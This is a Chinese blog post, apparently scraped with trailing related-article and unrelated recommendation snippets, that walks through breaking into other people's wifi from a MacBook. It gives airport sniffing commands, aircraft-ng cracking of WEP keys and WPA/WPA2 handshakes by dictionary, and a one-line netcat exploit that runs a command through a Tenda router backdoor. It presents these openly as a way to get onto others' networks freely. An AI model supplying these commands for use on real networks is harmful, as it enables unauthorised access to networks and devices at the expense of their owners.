目前无线网络的加密方式主要有WEP,WPA/WPA2。这是最常看到的加密方式,最近由于需要,专门去研究了一下如何入侵无线网络。

1、入侵WEP加密的无线网络

WEP加密方式现在已经很不安全了,因为只要通过一定量的数据包,就可以穷举出密码,无论密码多么复杂,也最多需要几分钟而已。

WEP的秘钥分为5位和13位。

入侵主要流程:

1)先查看附近的wifi信号

1
airport -s

2)选定其中一个wifi信号,看到其所在的频道,开始监听抓包

1
sudo airport en0 sniff 11

en0 代表无线网卡,11代表要监听的无线信号在11频道上,此时笔记本进入了监听阶段,抓到的包保存为/tmp/airportSniffxxxxx.cap

3)此时我们可以一边抓包,一边进行解密

1
aircrack-ng -1 -a 1 -e xx:xx:xx:xx:xx:xx /tmp/airportSniffxxxxx.cap

-e 代表目的MAC地址

-a 1 代表使用WEP破解方式

只要包到达了一定数量,密码很快就出来了。

注:对于13位的WEP,需要等多的数据包,例外,在数据包足够多时,但是又破解不出来的时候,可以尝试下提高 -f 影响因子的大小(默认为2),可以尝试提高到1024等。

2、入侵WPA/WPA2加密的无线网络

WPA/WPA2相对于WEP来说安全了很多,但是也存在着很大的隐患,虽然不会像WEP那样通过数据包直接分析出来了,但是需要获得了一次handshake,就可以用过字典暴力破解的方法获得秘钥。现在网上不管是弱密码还是已有的泄露的密码,都能找到很多,搜集整理出来一份很好地字典就能走到哪里都有无线可以蹭了。

入侵主要流程:

1)先查看附近的wifi信号

1
airport -s

2)选定其中一个wifi信号,看到其所在的频道,开始监听抓包

1
sudo airport en0 sniff 11

en0 代表无线网卡,11代表要监听的无线信号在11频道上,此时笔记本进入了监听阶段,抓到的包保存为/tmp/airportSniffxxxxx.cap

3)此时我们可以一边抓包,一边进行解密

1
aircrack-ng -w password.txt -e xx:xx:xx:xx:xx:xx /tmp/airportSniffxxxxx.cap

-w 后面代表字典文件

只要拥有一个handshake,就可以开始跑字典破解了。handshake是在监听阶段,有用户重新连接到无线上,就是一个handshake。

3、Tenda路由器后门利用

1
echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329

漏洞原理及利用:http://netsecurity.51cto.com/art/201310/413552.htm

利用MacBook Air入侵无线网络的更多相关文章

  1. 利用MacBookPro入侵无线网络

    目前无线网络的加密方式主要有WEP,WPA/WPA2.这是最常看到的加密方式,最近由于需要,专门去研究了一下如何入侵无线网络. 1.入侵WEP加密的无线网络 WEP加密方式现在已经很不安全了,因为只要 ...

  2. 三分钟PJ隐藏SSID无线网络

    一般来说用户可以通过路由或主机设置来隐藏无线信号的SSID网络信息,在这种情况下我们使用XP系统自带的无线信号扫描工具将看不到该无线网络的踪影,在这种情况下XP系统无线信号管理工具只能够看到将SSID ...

  3. WEP无线网络密码破解

    一,五分钟实现无线WEP入侵的特点: 众所周知WEP加密入侵需要用户通过监听等方法接收到足够数量的WEP验证数据包,然后通过分析软件使用暴力破解的方法穷举法还原出WEP加密密钥的明文信息.五分钟实现无 ...

  4. 从软件工程师的角度看MacBook Air的几个设计亮点

    我多年从事软件开发和运营工作,从未跟“设计”间断过.现在在设计一个全新saas产品:超级表格(www.domypp.com).最近买了台苹果最新款的笔记本电脑MacBook Air,从该产品功能设计和 ...

  5. MacBook Air装Windows7双系统后的一些(未尝试)想法

    转载请标注原地址:https://www.cnblogs.com/lixiaojing/p/11458477.html 运行环境: macOS在Mojave下的Boot Camp Assistant只 ...

  6. PDA移动POS终端系统,实现专柜或店铺的收货、零售、盘点通过无线网络直接连接总部中央数据库,实现高效安全的移动供应链管理

    利用PDA移动终端,实现专柜或店铺的收货.零售.盘点等一体化操作,通过无线网络直接连接总部中央数据库,实现高效安全的移动供应链管理. · PDA订货会应用解决方案利用PDA或电脑系统,在订货会现场直接 ...

  7. WPA-PSK无线网络破解原理及过程(转)

    本文将主要讲讲WPA-PSK类型的无线网络安全问题,首先我们看下802.11协议相关的基础知识. 802.11常见的几种认证方式: 1.不启用安全‍‍ ‍‍2.WEP‍‍ ‍‍3.WPA/WPA2-P ...

  8. RPI学习--环境搭建_无线网络的连接

    这里不讨论无线网卡的驱动问题,假设内核已经支持了该网卡. 发现命令行下添加无线网络比较麻烦,于是利用图形桌面的工具(WiFi Config)先配置好,在回到字符终端,发现网络已经配置好了 查看内网ip ...

  9. 2014款Macbook Air安装单独X64 Win7系统

    之所以写出来,是因为网上大多是用BootCamp安装双系统的,安装单独Win7的教程少之又少,然后大多数还写得不清不楚,所以折腾了一阵子.其实装好之后,还是觉得挺简单的. 我主要参考了两篇文章,链接如 ...

随机推荐

  1. Python--Get and Post

    #python3 get and post 简单封装 from urllib import request, parse import json def RequestMethod(methodR, ...

  2. 使用Ansible自动配置JDK环境

    1.首先安装好Ansible环境,具体步骤请见Ansible安装 2.先创建hosts文件(为后面编写脚本安装JDK做铺垫) [root@localhost /]# vi hosts [jdktest ...

  3. 部署本地gitlab

    一.gitlab简介 GitLab是利用 Ruby on Rails 一个开源的版本管理系统,实现一个自托管的Git项目仓库,可通过Web界面进行访问公开的或者私人项目.它拥有与Github类似的功能 ...

  4. Zipline Development Guidelines

    Development Guidelines This page is intended for developers of Zipline, people who want to contribut ...

  5. js Ajax 跨域请求

    一.使用jsonp的方式(只支持get请求) 二.使用cors的方式(支持HTTP的大部分请求方式) 三.apache的转发(修改服务器配置) 没有试验,暂时不详细写!

  6. LeetCode_Compare Version Numbers

    题目: Compare two version numbers version1 and version2. If version1 > version2 return 1, if versio ...

  7. MPI Maelstrom---poj1502(最短路模板)

    题目链接:http://poj.org/problem?id=1502 题意:求从处理器1到其它处理器所需的最少时间是多少: 输入是下三角,如果是x表示A[i][j]不能直接联系: #include ...

  8. CDH部署日志

    CDH部署时出现如图所示的错误 可去服务器查看:/opt/cm-5.5.0/run/cloudera-scm-agent/process/ccdeploy_hbase-conf_etchbasecon ...

  9. Oracle中查看建立索引和使用索引的注意点

    一.查看和建立索引 select * from user_indexes where table_name = 'student' create index i_student_num on stud ...

  10. 细说PHP7

    PHP7带来的新东西 1.类型的声明. 可以使用字符串(string), 整数 (int), 浮点数 (float), 以及布尔值 (bool),来声明函数的参数类型与函数返回值. declare(s ...